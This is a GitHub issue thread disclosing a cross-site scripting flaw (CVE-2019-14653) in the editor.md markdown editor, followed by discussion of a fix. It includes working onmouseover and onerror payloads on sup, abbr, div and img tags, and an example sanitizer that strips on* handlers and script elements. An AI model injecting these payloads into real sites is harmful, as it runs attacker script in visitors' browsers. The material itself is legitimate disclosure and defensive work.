XSS vulnerability on <abbr> and <sup>. #715

Open
Ry0taK opened this issue Aug 2, 2019 · 7 comments
Comments

Ry0taK commented Aug 2, 2019

Summary

Because there are no attribute filters in the abbr and sup tags, an attacker can trigger XSS on websites which are using editor.md.

CVE

CVE-2019-14653

Payloads

This will execute JavaScript when you move the mouse on any part of the page.

<sup style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('sup')">sup</sup>
<abbr style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('abbr')">abbr</abbr>

Images

screenshot

@BedRemka

sup
abbr

@huntr-helper

👋 Hey! We've recently opened a bug bounty against this issue, so if you want to get rewarded 💰 for fixing this vulnerability 🕷, head over to https://huntr.dev!

alromh87 added a commit to alromh87/editor.md that referenced this issue Mar 25, 2020
alromh87 commented Mar 25, 2020

Hello, while bug-bounty hunting this issue, I noticed the filter is implemented; you should use

htmlDecode : "|on*"

while starting the editor. This should be the preferred method; that way it protects against code injection in all elements (div, img, ....), not just abbr & sup.

XSS can also be achieved with many more elements:

<div style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('div')">div</div>

Sent a PR updating the README to make it clear.

alromh87 added a commit to alromh87/editor.md that referenced this issue Mar 27, 2020
Disable script and on events by default to avoid XSS.

User can enable by setting allowScript|allowOn

Readme updated
@fluix-dev

Is there anything else that needs to be done? The PR seems to have been merged.

@alromh87

I think this can be closed

@alromh87

After looking deeper I realized the filter is ineffective for self-closing tags, will look into it.

@alromh87

Should work properly now
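The filter discussed in this thread (drop inline `on*` event handlers, and `<script>` elements, unless the integrator opts in), written out as an added example that is not editor.md's own code. The option names `allowScript` and `allowOn` are borrowed from the commit message above; the regexes and function names are this example's own and do not describe the project's real `htmlDecode` implementation. It also covers the self-closing-tag case (for instance `<img ... />`) that the follow-up comment says the first version of the filter missed. The sample inputs are constructed for the demonstration.

```javascript
// Added example, not editor.md's own code: an on*-attribute filter in the spirit
// of the thread's fix. Option names allowScript/allowOn come from the commit
// message; everything else here is the example's own, not the project's API.

// One opening or self-closing tag: tag name, raw attribute text, optional "/".
// The lazy attribute group stops before a trailing "/>" so that self-closing
// tags such as <img ... /> are handled exactly like ordinary opening tags.
const TAG_RE = /<([a-zA-Z][\w:-]*)([^>]*?)\s*(\/?)>/g;

// One attribute inside that text: a name, then an optional quoted or unquoted
// value. Anything that does not look like a well-formed attribute is dropped.
const ATTR_RE = /\s+([^\s"'>\/=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;

// Whole <script> elements, case-insensitive, including their content.
const SCRIPT_RE = /<script\b[^>]*>[\s\S]*?<\/script\s*>/gi;

// Remove every attribute whose name starts with "on" (onmouseover, onerror, ...)
// from every tag, keeping the remaining attributes and the self-closing marker.
function stripOnAttributes(html) {
  return html.replace(TAG_RE, (_whole, name, attrText, selfClose) => {
    const kept = [];
    ATTR_RE.lastIndex = 0;
    let m;
    while ((m = ATTR_RE.exec(attrText)) !== null) {
      // Case-insensitive prefix check: ONCLICK and onClick are the same attribute.
      // Deliberately broad: any attribute beginning with "on" is dropped.
      if (!m[1].toLowerCase().startsWith('on')) {
        kept.push(m[0].trim());
      }
    }
    const attrs = kept.length ? ' ' + kept.join(' ') : '';
    return `<${name}${attrs}${selfClose ? ' /' : ''}>`;
  });
}

// Both protections are on by default; an integrator has to opt in to turn them off.
function sanitizeEditorHtml(html, { allowScript = false, allowOn = false } = {}) {
  let out = html;
  if (!allowScript) out = out.replace(SCRIPT_RE, '');
  if (!allowOn) out = stripOnAttributes(out);
  return out;
}

// Constructed inputs: the thread's div payload shape, a self-closing tag (the
// case the later comment says the first filter missed), an upper-case unquoted
// handler, and a harmless abbr followed by a script element.
const SAMPLES = [
  '<div style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert(\'div\')">div</div>',
  '<img src="x" onerror="alert(\'img\')" />',
  '<sup ONMOUSEOVER=alert(1)>sup</sup>',
  '<abbr title="ok">abbr</abbr><script>alert(1)</script>',
];

// Returns the sanitized form of each sample, in order.
function demo() {
  return SAMPLES.map((s) => sanitizeEditorHtml(s));
}
```

Note that, like the `"|on*"` filter in the thread, this leaves the `style` attribute in place, so the oversized fixed-position element is still rendered; only the handler that would run code is removed. A regex-based filter of this kind is an approximation of HTML tokenization, so for anything beyond a markdown preview a parser-based sanitizer is the stronger default.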

alromh87 added a commit to alromh87/editor.md that referenced this issue Sep 10, 2020
fixes #pandao#612
fixes #pandao#662
fixes #pandao#697
fixes #pandao#700
fixes #pandao#701
fixes #pandao#709
fixes #pandao#715
fixes #pandao#764
fixes #pandao#816

### Probably:
fixes #pandao#307
fixes #pandao#560
alromh87 added a commit to alromh87/editor.md that referenced this issue Sep 10, 2020
fixes #pandao#612
fixes #pandao#662
fixes #pandao#697
fixes #pandao#700
fixes #pandao#701
fixes #pandao#709
fixes #pandao#715
fixes #pandao#764
fixes #pandao#816

fixes #pandao#307
fixes #pandao#560
5 participants